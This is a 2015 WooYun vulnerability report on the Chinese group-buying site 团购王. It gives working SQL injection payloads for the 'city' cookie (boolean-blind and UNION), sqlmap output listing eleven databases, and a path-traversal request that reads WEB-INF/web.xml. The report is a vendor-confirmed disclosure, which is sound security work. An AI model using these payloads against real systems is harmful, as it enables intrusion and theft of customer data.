当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118425

漏洞标题:团购王主站某处cookies注入附送任意文件下载(800万用户&400万订单信息 )

相关厂商:团购王

漏洞作者: 天地不仁 以万物为刍狗

提交时间:2015-06-05 15:50

修复时间:2015-07-24 16:24

公开时间:2015-07-24 16:24

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-05: 细节已通知厂商并且等待厂商处理中
2015-06-09: 厂商已经确认,细节仅向厂商公开
2015-06-19: 细节向核心白帽子及相关领域专家公开
2015-06-29: 细节向普通白帽子公开
2015-07-09: 细节向实习白帽子公开
2015-07-24: 细节向公众公开

简要描述:

【HD】 以团队之名 以个人之荣耀 共建网络安全

详细说明:

看见 WooYun: 团购王主站SQL注射800万用户&400万订单信息 这里说主站有漏洞 于是也去测试了下 结果发现他这个漏洞应该是 登陆那里 在测试的时候 竟然发现 cookie 处也能注入
POST数据包:

POST /index.php?m=login HTTP/1.1
Host: www.go.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.go.cn/index.php?m=login
Cookie: city=1; cityname=beijing; citynames=%E5%8C%97%E4%BA%AC; PHPSESSID=nkeehdqk76087ak3t31umu6iq1; sessionid_cart=nkeehdqk76087ak3t31umu6iq1; defaultcityname_head=wuxi; defaultcitychinesename_head=%E6%97%A0%E9%94%A1; Hm_lvt_6b810083d1fb4aec26d2e6992d268ee7=1433480028; Hm_lpvt_6b810083d1fb4aec26d2e6992d268ee7=1433480642; history=orange.go.cn; __utma=241146517.1482849324.1433480227.1433480227.1433480227.1; __utmb=241146517.4.10.1433480227; __utmc=241146517; __utmz=241146517.1433480227.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _adwb=148565553; _adwc=148565553; _adwp=148565553.9755905871.1433480227.1433480227.1433480227.1; show_add=1; CNZZDATA1000130237=1426744184-1433477323-http%253A%252F%252Fwww.go.cn%252F%7C1433477323; _jzqa=1.3415547374476662000.1433480237.1433480237.1433480237.1; _jzqb=1.3.10.1433480237.1; _jzqc=1; _jzqx=1.1433480237.1433480237.1.jzqsr=go%2Ecn|jzqct=/beijing.-; _jzqckmp=1; PHPSESSID=0ipgpbdilbf9l3ckgil2u97an7; login360url=%2Findex.php%3Fm%3Dlogin; return_sourcepage=http%3A%2F%2Fwww.go.cn%2Findex.php%3Fgroupname%3D%2522%26cityid%3D1%26act%3D%26m%3Dselect_next%26loginsuccess%3Dtrue; login_buy_url=http%3A%2F%2Fwww.go.cn%2Findex.php%3Fgroupname%3D%2522%26cityid%3D1%26act%3D%26m%3Dselect_next; _qzja=1.338947553.1433480236530.1433480236530.1433480236530.1433480609472.1433480642059.0.0.0.3.1; _qzjb=1.1433480236530.3.0.0.0; _qzjc=1; _qzjto=3.1.0; codeyama=nkeehdqk76087ak3t31umu6iq1
X-Forwarded-For: 8.8.8.8'
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
email=wooyun&password=admin888&loginyzm=yrkx&r=&commit=%E7%99%BB%E5%BD%95


其中 email 处可以注入 但是 cookie 的 city 也照样可以注入(具体参数可见底下的漏洞证明)

0.png


1.png


总11个数据库

[13:29:18] [INFO] fetching database names
[13:29:18] [INFO] the SQL query used returns 11 entries
[13:29:18] [INFO] retrieved: information_schema
[13:29:19] [INFO] retrieved: baiduzy
[13:29:19] [INFO] retrieved: go
[13:29:19] [INFO] retrieved: go.cn
[13:29:19] [INFO] retrieved: gocnappapi
[13:29:20] [INFO] retrieved: gocnopen
[13:29:20] [INFO] retrieved: mysql
[13:29:20] [INFO] retrieved: nuomi
[13:29:20] [INFO] retrieved: percona
[13:29:21] [INFO] retrieved: performance_schema
[13:29:21] [INFO] retrieved: test
available databases [11]:
[*] baiduzy
[*] go
[*] go.cn
[*] gocnappapi
[*] gocnopen
[*] information_schema
[*] mysql
[*] nuomi
[*] percona
[*] performance_schema
[*] test
[13:29:21] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 1 times
[13:29:21] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\www.go.cn'


自己懒得去查 不过按照 WooYun: 团购王主站SQL注射800万用户&400万订单信息 所说 应该就有 800万用户&400万订单信息了 其中 看了下 go 数据库数量

2.png


go.cn 数据库 有 230个表

3.png


另外附送一处 File path manipulation
POST数据包:

POST /manage/action.jspa HTTP/1.1
Host: mailadv.go.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://mailadv.go.cn/manage/login.jsp
Cookie: JSESSIONID=HnlgVxpS1ShGpPYgHCxSb7zQppsMfw8yRldDchhmT421XbQ9bQFQ!738445587
X-Forwarded-For: 8.8.8.8'
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 154
actionClassName=com.bll.act.SysAdminLoginAct&inputForm=%2fmanage%2f..%2fWEB-INF%2fweb.xml&sysAdminName=admin&sysAdminPwd=admin&token=c25a6&commit=%E7%99%BB%E5%BD%95


inputForm 参数可变化为路径
如上发送可得到 WEB-INF/web.xml 内容

4.png


漏洞证明:

Cookie parameter 'city' is vulnerable. Do you want to keep testing the others (i
f any)? [y/N] n
sqlmap identified the following injection points with a total of 98 HTTP(s) requ
ests:
---
Parameter: city (Cookie)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY
clause
Payload: city=1' RLIKE (SELECT (CASE WHEN (2625=2625) THEN 1 ELSE 0x28 END))
AND 'ChNl'='ChNl; cityname=beijing; citynames=%E5%8C%97%E4%BA%AC; PHPSESSID=nke
ehdqk76087ak3t31umu6iq1; sessionid_cart=nkeehdqk76087ak3t31umu6iq1; defaultcityn
ame_head=wuxi; defaultcitychinesename_head=%E6%97%A0%E9%94%A1; Hm_lvt_6b810083d1
fb4aec26d2e6992d268ee7=1433480028; Hm_lpvt_6b810083d1fb4aec26d2e6992d268ee7=1433
480642; history=orange.go.cn; __utma=241146517.1482849324.1433480227.1433480227.
1433480227.1; __utmb=241146517.4.10.1433480227; __utmc=241146517; __utmz=2411465
17.1433480227.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _adwb=148565553
; _adwc=148565553; _adwp=148565553.9755905871.1433480227.1433480227.1433480227.1
; show_add=1; CNZZDATA1000130237=1426744184-1433477323-http%3A%2F%2Fwww.go.cn%2F
|1433477323; _jzqa=1.3415547374476662000.1433480237.1433480237.1433480237.1; _jz
qb=1.3.10.1433480237.1; _jzqc=1; _jzqx=1.1433480237.1433480237.1.jzqsr=go.cn|jzq
ct=/beijing.-; _jzqckmp=1; PHPSESSID=0ipgpbdilbf9l3ckgil2u97an7; login360url=/in
dex.php?m=login; return_sourcepage=http://www.go.cn/index.php?groupname=%22%26ci
tyid=1%26act=%26m=select_next%26loginsuccess=true; login_buy_url=http://www.go.c
n/index.php?m=login; _qzja=1.338947553.1433480236530.1433480236530.1433480236530
.1433480609472.1433480642059.0.0.0.3.1; _qzjb=1.1433480236530.3.0.0.0; _qzjc=1;
_qzjto=3.1.0; codeyama=nkeehdqk76087ak3t31umu6iq1
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: city=-2634' UNION ALL SELECT CONCAT(0x7171787871,0x51494e694d42667a
586c,0x71766b6271)-- ; cityname=beijing; citynames=%E5%8C%97%E4%BA%AC; PHPSESSID
=nkeehdqk76087ak3t31umu6iq1; sessionid_cart=nkeehdqk76087ak3t31umu6iq1; defaultc
ityname_head=wuxi; defaultcitychinesename_head=%E6%97%A0%E9%94%A1; Hm_lvt_6b8100
83d1fb4aec26d2e6992d268ee7=1433480028; Hm_lpvt_6b810083d1fb4aec26d2e6992d268ee7=
1433480642; history=orange.go.cn; __utma=241146517.1482849324.1433480227.1433480
227.1433480227.1; __utmb=241146517.4.10.1433480227; __utmc=241146517; __utmz=241
146517.1433480227.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _adwb=14856
5553; _adwc=148565553; _adwp=148565553.9755905871.1433480227.1433480227.14334802
27.1; show_add=1; CNZZDATA1000130237=1426744184-1433477323-http%3A%2F%2Fwww.go.c
n%2F|1433477323; _jzqa=1.3415547374476662000.1433480237.1433480237.1433480237.1;
_jzqb=1.3.10.1433480237.1; _jzqc=1; _jzqx=1.1433480237.1433480237.1.jzqsr=go.cn
|jzqct=/beijing.-; _jzqckmp=1; PHPSESSID=0ipgpbdilbf9l3ckgil2u97an7; login360url
=/index.php?m=login; return_sourcepage=http://www.go.cn/index.php?groupname=%22%
26cityid=1%26act=%26m=select_next%26loginsuccess=true; login_buy_url=http://www.
go.cn/index.php?m=login; _qzja=1.338947553.1433480236530.1433480236530.143348023
6530.1433480609472.1433480642059.0.0.0.3.1; _qzjb=1.1433480236530.3.0.0.0; _qzjc
=1; _qzjto=3.1.0; codeyama=nkeehdqk76087ak3t31umu6iq1
---
[13:29:17] [INFO] testing MySQL
[13:29:17] [INFO] confirming MySQL
[13:29:18] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0


修复方案:

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-06-09 16:23

厂商回复:

会尽快修复

最新状态:

暂无


漏洞评价:

评论